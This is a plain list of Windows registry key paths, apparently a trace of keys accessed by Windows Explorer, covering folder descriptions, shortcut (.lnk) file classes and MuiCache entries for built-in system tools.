HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\CLSID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NeverShowExt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-735
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-734
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\AccessibilityCpl.dll,-10
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-737
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Programs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Start Menu
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\sud.dll,-1
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wucltux.dll,-1
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\ehome\ehres.dll,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Windows Sidebar\sidebar.exe,-1005
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\WindowsAnytimeUpgradeUI.exe,-1
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\DVD Maker\DVDMaker.exe,-61403
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\FXSRESM.dll,-114
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\unregmp2.exe,-4
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\XpsRchVw.exe,-102
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\displayswitch.exe,-320
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Common Files\Microsoft Shared\Ink\mip.exe,-291
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\mblctr.exe,-1008
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\NetProjW.dll,-501
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\mstsc.exe,-4000
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\SnippingTool.exe,-15051
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\SoundRecorder.exe,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\SNTSearch.dll,-505
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\SyncCenter.dll,-3000
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\OobeFldr.dll,-33056
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\Speech\SpeechUX\sapi.cpl,-5555
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\dfrgui.exe,-103
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wdc.dll,-10030
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\msinfo32.exe,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\rstrui.exe,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\miguiresource.dll,-201
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\migwiz\wet.dll,-591
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\migwiz\wet.dll,-588
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Common Files\Microsoft Shared\Ink\ShapeCollector.exe,-298
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Common Files\Microsoft Shared\Ink\TipTsf.dll,-80
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Program Files\Windows Journal\Journal.exe,-3074
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe,-102
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe,-101
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\comres.dll,-3410
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\mycomput.dll,-300
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\odbcint.dll,-1310
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\miguiresource.dll,-101
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\iscsicpl.dll,-5001
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\MdSched.exe,-4001
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wdc.dll,-10021
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\pmcsnap.dll,-700
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\wsecedit.dll,-718
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\filemgmt.dll,-2204
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\msconfig.exe,-126
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\System32\AuthFWGP.dll,-20
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\gameux.dll,-10082
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\sdcpl.dll,-101
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\recdisc.exe,-2000
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@C:\Windows\system32\msra.exe,-100
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParentFolder
